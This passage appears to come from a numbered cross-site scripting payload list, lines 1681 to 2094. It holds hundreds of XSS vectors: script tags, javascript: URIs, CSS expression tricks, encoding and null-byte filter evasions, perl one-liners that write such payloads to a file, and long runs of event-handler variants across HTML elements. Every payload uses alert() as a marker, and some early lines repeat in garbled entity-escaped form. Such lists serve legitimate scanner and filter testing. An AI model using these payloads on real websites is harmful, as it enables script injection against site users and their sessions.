  1681. &apos;;alert(1804))//\&apos;;alert(1804))//&quot;;alert(1804))//\&quot;;alert(1804))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(1804))&lt;/SCRIPT&gt;
  1682. &lt;SCRIPT&gt;alert(1805)&lt;/SCRIPT&gt;
  1683. &lt;SCRIPT&gt;alert(1806))&lt;/SCRIPT&gt;
  1684. &lt;BASE HREF=&quot;javascript:alert(1807);//&quot;&gt;
  1685. &lt;BGSOUND SRC=&quot;javascript:alert(1808);&quot;&gt;
  1686. &lt;BODY BACKGROUND=&quot;javascript:alert(1809);&quot;&gt;
  1687. &lt;BODY ONLOAD=alert(1810)&gt;
  1688. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(1811))&quot;&gt;
  1689. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(1812))&quot;&gt;
  1690. &lt;DIV STYLE=&quot;width: expression(alert(1813));&quot;&gt;
  1691. &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(1814);&quot;&gt;&lt;/FRAMESET&gt;
  1692. &lt;IFRAME SRC=&quot;javascript:alert(1815);&quot;&gt;&lt;/IFRAME&gt;
  1693. &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(1816);&quot;&gt;
  1694. &lt;IMG SRC=&quot;javascript:alert(1817);&quot;&gt;
  1695. &lt;IMG SRC=javascript:alert(1818)&gt;
  1696. &lt;IMG DYNSRC=&quot;javascript:alert(1819);&quot;&gt;
  1697. &lt;IMG LOWSRC=&quot;javascript:alert(1820);&quot;&gt;
  1698. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(1821)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  1699. %BCscript%BEalert(1822)%BC/script%BE
  1700. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(1823);&quot;&gt;
  1701. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(1824);&quot;&gt;
  1702. &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(1825)&gt;&lt;/OBJECT&gt;
  1703. a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(1826);&quot;)&quot;;&#10;eval(a+b+c+d);
  1704. &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(1827);&lt;/STYLE&gt;
  1705. &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(1828))&quot;&gt;
  1706. &lt;XSS STYLE=&quot;xss:expression(alert(1829))&quot;&gt;
  1707. &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(1830)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  1708. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(1831)&quot;)}&lt;/STYLE&gt;
  1709. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(1832);&quot;&gt;
  1710. &lt;TABLE BACKGROUND=&quot;javascript:alert(1833)&quot;&gt;&lt;/TABLE&gt;
  1711. &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(1834)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  1712. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(1835);&quot;&gt;]]&gt;
  1713. &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(1836)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  1714. &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(1837)&lt;/SCRIPT&gt;&quot;&gt;
  1715. &lt;BR SIZE=&quot;&amp;{alert(1838)}&quot;&gt;
  1716. &lt;IMG SRC=JaVaScRiPt:alert(1839)&gt;
  1717. &lt;IMG SRC=javascript:alert(1840)&gt;
  1718. &lt;IMG SRC=`javascript:alert(1841)`&gt;
  1719. &lt;IMG SRC=javascript:alert(1842))&gt;
  1720. &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1843);+ADw-/SCRIPT+AD4-
  1721. \&quot;;alert(1844);//
  1722. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(1845);&lt;/SCRIPT&gt;
  1723. &lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(1846)&apos;;&lt;/STYLE&gt;
  1724. &lt;IMG SRC=&quot;jav&#x09;ascript:alert(1847);&quot;&gt;
  1725. &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(1848);&quot;&gt;
  1726. &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(1849);&quot;&gt;
  1727. &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(1850);&quot;&gt;
  1728. perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(1851)>&quot;;&apos;&gt; out
  1729. perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(1852)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
  1730. &lt;IMG SRC=&quot; &amp;#14; javascript:alert(1853);&quot;&gt;
  1731. &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1854)&gt;
  1732. &lt;IMG SRC=&quot;javascript:alert(1855)&quot;
  1733. &lt;&lt;SCRIPT&gt;alert(1856);//&lt;&lt;/SCRIPT&gt;
  1734. &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(1857)&lt;/SCRIPT&gt;&quot;&gt;
  1735. &quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1858)&gt;
  1736. &lt;/script&gt;&lt;script&gt;alert(1859)&lt;/script&gt;
  1737. &lt;scrscriptipt&gt;alert(1861)&lt;/scrscriptipt&gt;
  1738. &lt;br size=\&quot;&amp;{alert(1862)}\&quot;&gt;
  1739. perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(1863)&gt;\&quot;;&#039; &gt; out
  1740. perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(1864)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
  1741. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1865))>
  1742. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1866))>
  1743. <~/XSS STYLE=xss:expression(alert(1867))>
  1744. "><script>alert(1868)</script>
  1745. </XSS/*-*/STYLE=xss:e/**/xpression(alert(1869))>
  1746. XSS/*-*/STYLE=xss:e/**/xpression(alert(1870))>
  1747. XSS STYLE=xss:e/**/xpression(alert(1871))>
  1748. </XSS STYLE=xss:expression(alert(1872))>
  1749. ';;alert(1873))//\';;alert(1873))//";;alert(1873))//\";;alert(1873))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(1873))<;/SCRIPT>;
  1750. <;SCRIPT>;alert(1874)<;/SCRIPT>;
  1751. <;SCRIPT>;alert(1875))<;/SCRIPT>;
  1752. <;BASE HREF=";javascript:alert(1876);//";>;
  1753. <;BGSOUND SRC=";javascript:alert(1877);";>;
  1754. <;BODY BACKGROUND=";javascript:alert(1878);";>;
  1755. <;BODY ONLOAD=alert(1879)>;
  1756. <;DIV STYLE=";background-image: url(javascript:alert(1880))";>;
  1757. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(1881))";>;
  1758. <;DIV STYLE=";width: expression(alert(1882));";>;
  1759. <;FRAMESET>;<;FRAME SRC=";javascript:alert(1883);";>;<;/FRAMESET>;
  1760. <;IFRAME SRC=";javascript:alert(1884);";>;<;/IFRAME>;
  1761. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(1885);";>;
  1762. <;IMG SRC=";javascript:alert(1886);";>;
  1763. <;IMG SRC=javascript:alert(1887)>;
  1764. <;IMG DYNSRC=";javascript:alert(1888);";>;
  1765. <;IMG LOWSRC=";javascript:alert(1889);";>;
  1766. <;STYLE>;li {list-style-image: url(";javascript:alert(1890)";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1767. %BCscript%BEalert(1891)%BC/script%BE
  1768. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(1892);";>;
  1769. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(1893);";>;
  1770. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(1894)>;<;/OBJECT>;
  1771. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(1895);";)";;&#10;eval(a+b+c+d);
  1772. <;STYLE TYPE=";text/javascript";>;alert(1896);<;/STYLE>;
  1773. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(1897))";>;
  1774. <;XSS STYLE=";xss:expression(alert(1898))";>;
  1775. <;STYLE>;.XSS{background-image:url(";javascript:alert(1899)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1776. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(1900)";)}<;/STYLE>;
  1777. <;LINK REL=";stylesheet"; HREF=";javascript:alert(1901);";>;
  1778. <;TABLE BACKGROUND=";javascript:alert(1902)";>;<;/TABLE>;
  1779. <;TABLE>;<;TD BACKGROUND=";javascript:alert(1903)";>;<;/TD>;<;/TABLE>;
  1780. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(1904);";>;]]>;
  1781. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(1905)";>;<;/B>;<;/I>;<;/XML>;
  1782. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(1906)<;/SCRIPT>;";>;
  1783. <;BR SIZE=";&;{alert(1907)}";>;
  1784. <;IMG SRC=JaVaScRiPt:alert(1908)>;
  1785. <;IMG SRC=javascript:alert(1909)>;
  1786. <;IMG SRC=`javascript:alert(1910)`>;
  1787. <;IMG SRC=javascript:alert(1911))>;
  1788. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(1912);+ADw-/SCRIPT+AD4-
  1789. \";;alert(1913);//
  1790. <;/TITLE>;<;SCRIPT>;alert(1914);<;/SCRIPT>;
  1791. <;STYLE>;@im\port';\ja\vasc\ript:alert(1915)';;<;/STYLE>;
  1792. <;IMG SRC=";jav&#x09;ascript:alert(1916);";>;
  1793. <;IMG SRC=";jav&;#x09;ascript:alert(1917);";>;
  1794. <;IMG SRC=";jav&;#x0A;ascript:alert(1918);";>;
  1795. <;IMG SRC=";jav&;#x0D;ascript:alert(1919);";>;
  1796. perl -e ';print ";<;IM SRC=java\0script:alert(1920)>";;';>; out
  1797. perl -e ';print ";&;<;SCR\0IPT>;alert(1921)<;/SCR\0IPT>;";;'; >; out
  1798. <;IMG SRC="; &;#14; javascript:alert(1922);";>;
  1799. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(1923)>;
  1800. <;IMG SRC=";javascript:alert(1924)";
  1801. <;<;SCRIPT>;alert(1925);//<;<;/SCRIPT>;
  1802. <;IMG ";";";>;<;SCRIPT>;alert(1926)<;/SCRIPT>;";>;
  1803. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(1927)>;
  1804. <;/script>;<;script>;alert(1928)<;/script>;
  1805. <;scrscriptipt>;alert(1930)<;/scrscriptipt>;
  1806. <;br size=\";&;{alert(1931)}\";>;
  1807. perl -e &#039;print \";<;IMG SRC=java\0script:alert(1932)>;\";;&#039; >; out
  1808. perl -e &#039;print \";<;SCR\0IPT>;alert(1933)<;/SCR\0IPT>;\";;&#039; >; out
  1809. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1934))>
  1810. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(1935))>
  1811. <~/XSS STYLE=xss:expression(alert(1936))>
  1812. "><script>alert(1937)</script>
  1813. </XSS/*-*/STYLE=xss:e/**/xpression(alert(1938))>
  1814. XSS/*-*/STYLE=xss:e/**/xpression(alert(1939))>
  1815. XSS STYLE=xss:e/**/xpression(alert(1940))>
  1816. </XSS STYLE=xss:expression(alert(1941))>
  1817. >"><script>alert(1942)</script>&
  1818. "><STYLE>@import"javascript:alert(1943)";</STYLE>
  1819. >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(1944)>
  1820. >%22%27><img%20src%3d%22javascript:alert(1945)%22>
  1821. '%uff1cscript%uff1ealert(1946)%uff1c/script%uff1e'
  1822. <IMG SRC="javascript:alert(1947);">
  1823. <IMG SRC=javascript:alert(1948)>
  1824. <IMG SRC=JaVaScRiPt:alert(1949)>
  1825. <IMG SRC=JaVaScRiPt:alert(1950)>
  1826. <IMG SRC="jav&#x0A;ascript:alert(1951);">
  1827. <IMG SRC="jav&#x0D;ascript:alert(1952);">
  1828. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(1953);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1829. <script>alert(1954)</script>
  1830. %3cscript%3ealert(1955)%3c/script%3e
  1831. %22%3e%3cscript%3ealert(1956)%3c/script%3e
  1832. <IMG SRC="javascript:alert(1957);">
  1833. <IMG SRC=javascript:alert(1958)>
  1834. <IMG SRC=javascript:alert(1959)>
  1835. <img src=xss onerror=alert(1960)>
  1836. <IMG """><SCRIPT>alert(1961)</SCRIPT>">
  1837. <IMG SRC=javascript:alert(1962))>
  1838. <IMG SRC="jav ascript:alert(1963);">
  1839. <IMG SRC="jav&#x09;ascript:alert(1964);">
  1840. <BODY BACKGROUND="javascript:alert(1965)">
  1841. <BODY ONLOAD=alert(1966)>
  1842. <INPUT TYPE="IMAGE" SRC="javascript:alert(1967);">
  1843. <IMG SRC="javascript:alert(1968)"
  1844. <<SCRIPT>alert(1969);//<</SCRIPT>
  1845. %253cscript%253ealert(1970)%253c/script%253e
  1846. "><s"%2b"cript>alert(1971)</script>
  1847. foo<script>alert(1972)</script>
  1848. <scr<script>ipt>alert(1973)</scr</script>ipt>
  1849. ';alert(1974))//\';alert(1974))//";alert(1974))//\";alert(1974))//--></SCRIPT>">'><SCRIPT>alert(1974))</SCRIPT>
  1850. <marquee onstart='javascript:alert(1975);'>=(◕_◕)=
  1851. </span></span><svg onload="alert(1976)//“ #"="">
  1852. <a draggable="true" ondrag="alert(1)">test</a>
  1853. <a draggable="true" ondragend="alert(1)">test</a>
  1854. <a draggable="true" ondragenter="alert(1)">test</a>
  1855. <a draggable="true" ondragleave="alert(1)">test</a>
  1856. <a draggable="true" ondragstart="alert(1)">test</a>
  1857. <a id=x tabindex=1 onactivate=alert(1)></a>
  1858. <a id=x tabindex=1 onbeforeactivate=alert(1)></a>
  1859. <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>
  1860. <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>
  1861. <a id=x tabindex=1 onfocus=alert(1)></a>
  1862. <a id=x tabindex=1 onfocusin=alert(1)></a>
  1863. <a onbeforecopy="alert(1)" contenteditable>test</a>
  1864. <a onbeforecut="alert(1)" contenteditable>test</a>
  1865. <a onbeforepaste="alert(1)" contenteditable>test</a>
  1866. <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
  1867. <a onclick="alert(1)">test</a>
  1868. <a oncontextmenu="alert(1)">test</a>
  1869. <a oncopy="alert(1)" contenteditable>test</a>
  1870. <a oncut="alert(1)" contenteditable>test</a>
  1871. <a ondblclick="alert(1)">test</a>
  1872. <a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
  1873. <a onkeydown="alert(1)" contenteditable>test</a>
  1874. <a onkeypress="alert(1)" contenteditable>test</a>
  1875. <a onkeyup="alert(1)" contenteditable>test</a>
  1876. <a onmousedown="alert(1)">test</a>
  1877. <a onmouseenter="alert(1)">test</a>
  1878. <a onmouseleave="alert(1)">test</a>
  1879. <a onmousemove="alert(1)">test</a>
  1880. <a onmouseout="alert(1)">test</a>
  1881. <a onmouseover="alert(1)">test</a>
  1882. <a onmouseup="alert(1)">test</a>
  1883. <a onpaste="alert(1)" contenteditable>test</a>
  1884. <abbr draggable="true" ondrag="alert(1)">test</abbr>
  1885. <abbr draggable="true" ondragend="alert(1)">test</abbr>
  1886. <abbr draggable="true" ondragenter="alert(1)">test</abbr>
  1887. <abbr draggable="true" ondragleave="alert(1)">test</abbr>
  1888. <abbr draggable="true" ondragstart="alert(1)">test</abbr>
  1889. <abbr id=x tabindex=1 onactivate=alert(1)></abbr>
  1890. <abbr id=x tabindex=1 onbeforeactivate=alert(1)></abbr>
  1891. <abbr id=x tabindex=1 onbeforedeactivate=alert(1)></abbr><input autofocus>
  1892. <abbr id=x tabindex=1 ondeactivate=alert(1)></abbr><input id=y autofocus>
  1893. <abbr id=x tabindex=1 onfocus=alert(1)></abbr>
  1894. <abbr id=x tabindex=1 onfocusin=alert(1)></abbr>
  1895. <abbr onbeforecopy="alert(1)" contenteditable>test</abbr>
  1896. <abbr onbeforecut="alert(1)" contenteditable>test</abbr>
  1897. <abbr onbeforepaste="alert(1)" contenteditable>test</abbr>
  1898. <abbr onblur=alert(1) tabindex=1 id=x></abbr><input autofocus>
  1899. <abbr onclick="alert(1)">test</abbr>
  1900. <abbr oncontextmenu="alert(1)">test</abbr>
  1901. <abbr oncopy="alert(1)" contenteditable>test</abbr>
  1902. <abbr oncut="alert(1)" contenteditable>test</abbr>
  1903. <abbr ondblclick="alert(1)">test</abbr>
  1904. <abbr onfocusout=alert(1) tabindex=1 id=x></abbr><input autofocus>
  1905. <abbr onkeydown="alert(1)" contenteditable>test</abbr>
  1906. <abbr onkeypress="alert(1)" contenteditable>test</abbr>
  1907. <abbr onkeyup="alert(1)" contenteditable>test</abbr>
  1908. <abbr onmousedown="alert(1)">test</abbr>
  1909. <abbr onmouseenter="alert(1)">test</abbr>
  1910. <abbr onmouseleave="alert(1)">test</abbr>
  1911. <abbr onmousemove="alert(1)">test</abbr>
  1912. <abbr onmouseout="alert(1)">test</abbr>
  1913. <abbr onmouseover="alert(1)">test</abbr>
  1914. <abbr onmouseup="alert(1)">test</abbr>
  1915. <abbr onpaste="alert(1)" contenteditable>test</abbr>
  1916. <acronym draggable="true" ondrag="alert(1)">test</acronym>
  1917. <acronym draggable="true" ondragend="alert(1)">test</acronym>
  1918. <acronym draggable="true" ondragenter="alert(1)">test</acronym>
  1919. <acronym draggable="true" ondragleave="alert(1)">test</acronym>
  1920. <acronym draggable="true" ondragstart="alert(1)">test</acronym>
  1921. <acronym id=x tabindex=1 onactivate=alert(1)></acronym>
  1922. <acronym id=x tabindex=1 onbeforeactivate=alert(1)></acronym>
  1923. <acronym id=x tabindex=1 onbeforedeactivate=alert(1)></acronym><input autofocus>
  1924. <acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus>
  1925. <acronym id=x tabindex=1 onfocus=alert(1)></acronym>
  1926. <acronym id=x tabindex=1 onfocusin=alert(1)></acronym>
  1927. <acronym onbeforecopy="alert(1)" contenteditable>test</acronym>
  1928. <acronym onbeforecut="alert(1)" contenteditable>test</acronym>
  1929. <acronym onbeforepaste="alert(1)" contenteditable>test</acronym>
  1930. <acronym onblur=alert(1) tabindex=1 id=x></acronym><input autofocus>
  1931. <acronym onclick="alert(1)">test</acronym>
  1932. <acronym oncontextmenu="alert(1)">test</acronym>
  1933. <acronym oncopy="alert(1)" contenteditable>test</acronym>
  1934. <acronym oncut="alert(1)" contenteditable>test</acronym>
  1935. <acronym ondblclick="alert(1)">test</acronym>
  1936. <acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus>
  1937. <acronym onkeydown="alert(1)" contenteditable>test</acronym>
  1938. <acronym onkeypress="alert(1)" contenteditable>test</acronym>
  1939. <acronym onkeyup="alert(1)" contenteditable>test</acronym>
  1940. <acronym onmousedown="alert(1)">test</acronym>
  1941. <acronym onmouseenter="alert(1)">test</acronym>
  1942. <acronym onmouseleave="alert(1)">test</acronym>
  1943. <acronym onmousemove="alert(1)">test</acronym>
  1944. <acronym onmouseout="alert(1)">test</acronym>
  1945. <acronym onmouseover="alert(1)">test</acronym>
  1946. <acronym onmouseup="alert(1)">test</acronym>
  1947. <acronym onpaste="alert(1)" contenteditable>test</acronym>
  1948. <address draggable="true" ondrag="alert(1)">test</address>
  1949. <address draggable="true" ondragend="alert(1)">test</address>
  1950. <address draggable="true" ondragenter="alert(1)">test</address>
  1951. <address draggable="true" ondragleave="alert(1)">test</address>
  1952. <address draggable="true" ondragstart="alert(1)">test</address>
  1953. <address id=x tabindex=1 onactivate=alert(1)></address>
  1954. <address id=x tabindex=1 onbeforeactivate=alert(1)></address>
  1955. <address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus>
  1956. <address id=x tabindex=1 ondeactivate=alert(1)></address><input id=y autofocus>
  1957. <address id=x tabindex=1 onfocus=alert(1)></address>
  1958. <address id=x tabindex=1 onfocusin=alert(1)></address>
  1959. <address onbeforecopy="alert(1)" contenteditable>test</address>
  1960. <address onbeforecut="alert(1)" contenteditable>test</address>
  1961. <address onbeforepaste="alert(1)" contenteditable>test</address>
  1962. <address onblur=alert(1) tabindex=1 id=x></address><input autofocus>
  1963. <address onclick="alert(1)">test</address>
  1964. <address oncontextmenu="alert(1)">test</address>
  1965. <address oncopy="alert(1)" contenteditable>test</address>
  1966. <address oncut="alert(1)" contenteditable>test</address>
  1967. <address ondblclick="alert(1)">test</address>
  1968. <address onfocusout=alert(1) tabindex=1 id=x></address><input autofocus>
  1969. <address onkeydown="alert(1)" contenteditable>test</address>
  1970. <address onkeypress="alert(1)" contenteditable>test</address>
  1971. <address onkeyup="alert(1)" contenteditable>test</address>
  1972. <address onmousedown="alert(1)">test</address>
  1973. <address onmouseenter="alert(1)">test</address>
  1974. <address onmouseleave="alert(1)">test</address>
  1975. <address onmousemove="alert(1)">test</address>
  1976. <address onmouseout="alert(1)">test</address>
  1977. <address onmouseover="alert(1)">test</address>
  1978. <address onmouseup="alert(1)">test</address>
  1979. <address onpaste="alert(1)" contenteditable>test</address>
  1980. <applet draggable="true" ondrag="alert(1)">test</applet>
  1981. <applet draggable="true" ondragend="alert(1)">test</applet>
  1982. <applet draggable="true" ondragenter="alert(1)">test</applet>
  1983. <applet draggable="true" ondragleave="alert(1)">test</applet>
  1984. <applet draggable="true" ondragstart="alert(1)">test</applet>
  1985. <applet id=x tabindex=1 onactivate=alert(1)></applet>
  1986. <applet id=x tabindex=1 onbeforeactivate=alert(1)></applet>
  1987. <applet id=x tabindex=1 onbeforedeactivate=alert(1)></applet><input autofocus>
  1988. <applet id=x tabindex=1 ondeactivate=alert(1)></applet><input id=y autofocus>
  1989. <applet id=x tabindex=1 onfocus=alert(1)></applet>
  1990. <applet id=x tabindex=1 onfocusin=alert(1)></applet>
  1991. <applet onbeforecopy="alert(1)" contenteditable>test</applet>
  1992. <applet onbeforecut="alert(1)" contenteditable>test</applet>
  1993. <applet onbeforepaste="alert(1)" contenteditable>test</applet>
  1994. <applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus>
  1995. <applet onclick="alert(1)">test</applet>
  1996. <applet oncontextmenu="alert(1)">test</applet>
  1997. <applet oncopy="alert(1)" contenteditable>test</applet>
  1998. <applet oncut="alert(1)" contenteditable>test</applet>
  1999. <applet ondblclick="alert(1)">test</applet>
  2000. <applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus>
  2001. <applet onkeydown="alert(1)" contenteditable>test</applet>
  2002. <applet onkeypress="alert(1)" contenteditable>test</applet>
  2003. <applet onkeyup="alert(1)" contenteditable>test</applet>
  2004. <applet onmousedown="alert(1)">test</applet>
  2005. <applet onmouseenter="alert(1)">test</applet>
  2006. <applet onmouseleave="alert(1)">test</applet>
  2007. <applet onmousemove="alert(1)">test</applet>
  2008. <applet onmouseout="alert(1)">test</applet>
  2009. <applet onmouseover="alert(1)">test</applet>
  2010. <applet onmouseup="alert(1)">test</applet>
  2011. <applet onpaste="alert(1)" contenteditable>test</applet>
  2012. <applet onreadystatechange=alert(1)></applet>
  2013. <area draggable="true" ondrag="alert(1)">test</area>
  2014. <area draggable="true" ondragend="alert(1)">test</area>
  2015. <area draggable="true" ondragenter="alert(1)">test</area>
  2016. <area draggable="true" ondragleave="alert(1)">test</area>
  2017. <area draggable="true" ondragstart="alert(1)">test</area>
  2018. <area id=x tabindex=1 onactivate=alert(1)></area>
  2019. <area id=x tabindex=1 onbeforeactivate=alert(1)></area>
  2020. <area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus>
  2021. <area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus>
  2022. <area onbeforecopy="alert(1)" contenteditable>test</area>
  2023. <area onbeforecut="alert(1)" contenteditable>test</area>
  2024. <area onbeforepaste="alert(1)" contenteditable>test</area>
  2025. <area onblur=alert(1) tabindex=1 id=x></area><input autofocus>
  2026. <area onclick="alert(1)">test</area>
  2027. <area oncontextmenu="alert(1)">test</area>
  2028. <area oncopy="alert(1)" contenteditable>test</area>
  2029. <area oncut="alert(1)" contenteditable>test</area>
  2030. <area ondblclick="alert(1)">test</area>
  2031. <area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus>
  2032. <area onkeydown="alert(1)" contenteditable>test</area>
  2033. <area onkeypress="alert(1)" contenteditable>test</area>
  2034. <area onkeyup="alert(1)" contenteditable>test</area>
  2035. <area onmousedown="alert(1)">test</area>
  2036. <area onmouseenter="alert(1)">test</area>
  2037. <area onmouseleave="alert(1)">test</area>
  2038. <area onmousemove="alert(1)">test</area>
  2039. <area onmouseout="alert(1)">test</area>
  2040. <area onmouseover="alert(1)">test</area>
  2041. <area onmouseup="alert(1)">test</area>
  2042. <area onpaste="alert(1)" contenteditable>test</area>
  2043. <article draggable="true" ondrag="alert(1)">test</article>
  2044. <article draggable="true" ondragend="alert(1)">test</article>
  2045. <article draggable="true" ondragenter="alert(1)">test</article>
  2046. <article draggable="true" ondragleave="alert(1)">test</article>
  2047. <article draggable="true" ondragstart="alert(1)">test</article>
  2048. <article id=x tabindex=1 onactivate=alert(1)></article>
  2049. <article id=x tabindex=1 onbeforeactivate=alert(1)></article>
  2050. <article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus>
  2051. <article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus>
  2052. <article id=x tabindex=1 onfocus=alert(1)></article>
  2053. <article id=x tabindex=1 onfocusin=alert(1)></article>
  2054. <article onbeforecopy="alert(1)" contenteditable>test</article>
  2055. <article onbeforecut="alert(1)" contenteditable>test</article>
  2056. <article onbeforepaste="alert(1)" contenteditable>test</article>
  2057. <article onblur=alert(1) tabindex=1 id=x></article><input autofocus>
  2058. <article onclick="alert(1)">test</article>
  2059. <article oncontextmenu="alert(1)">test</article>
  2060. <article oncopy="alert(1)" contenteditable>test</article>
  2061. <article oncut="alert(1)" contenteditable>test</article>
  2062. <article ondblclick="alert(1)">test</article>
  2063. <article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus>
  2064. <article onkeydown="alert(1)" contenteditable>test</article>
  2065. <article onkeypress="alert(1)" contenteditable>test</article>
  2066. <article onkeyup="alert(1)" contenteditable>test</article>
  2067. <article onmousedown="alert(1)">test</article>
  2068. <article onmouseenter="alert(1)">test</article>
  2069. <article onmouseleave="alert(1)">test</article>
  2070. <article onmousemove="alert(1)">test</article>
  2071. <article onmouseout="alert(1)">test</article>
  2072. <article onmouseover="alert(1)">test</article>
  2073. <article onmouseup="alert(1)">test</article>
  2074. <article onpaste="alert(1)" contenteditable>test</article>
  2075. <aside draggable="true" ondrag="alert(1)">test</aside>
  2076. <aside draggable="true" ondragend="alert(1)">test</aside>
  2077. <aside draggable="true" ondragenter="alert(1)">test</aside>
  2078. <aside draggable="true" ondragleave="alert(1)">test</aside>
  2079. <aside draggable="true" ondragstart="alert(1)">test</aside>
  2080. <aside id=x tabindex=1 onactivate=alert(1)></aside>
  2081. <aside id=x tabindex=1 onbeforeactivate=alert(1)></aside>
  2082. <aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus>
  2083. <aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus>
  2084. <aside id=x tabindex=1 onfocus=alert(1)></aside>
  2085. <aside id=x tabindex=1 onfocusin=alert(1)></aside>
  2086. <aside onbeforecopy="alert(1)" contenteditable>test</aside>
  2087. <aside onbeforecut="alert(1)" contenteditable>test</aside>
  2088. <aside onbeforepaste="alert(1)" contenteditable>test</aside>
  2089. <aside onblur=alert(1) tabindex=1 id=x></aside><input autofocus>
  2090. <aside onclick="alert(1)">test</aside>
  2091. <aside oncontextmenu="alert(1)">test</aside>
  2092. <aside oncopy="alert(1)" contenteditable>test</aside>
  2093. <aside oncut="alert(1)" contenteditable>test</aside>
  2094. <aside ondblclick="alert(1)">test</aside>
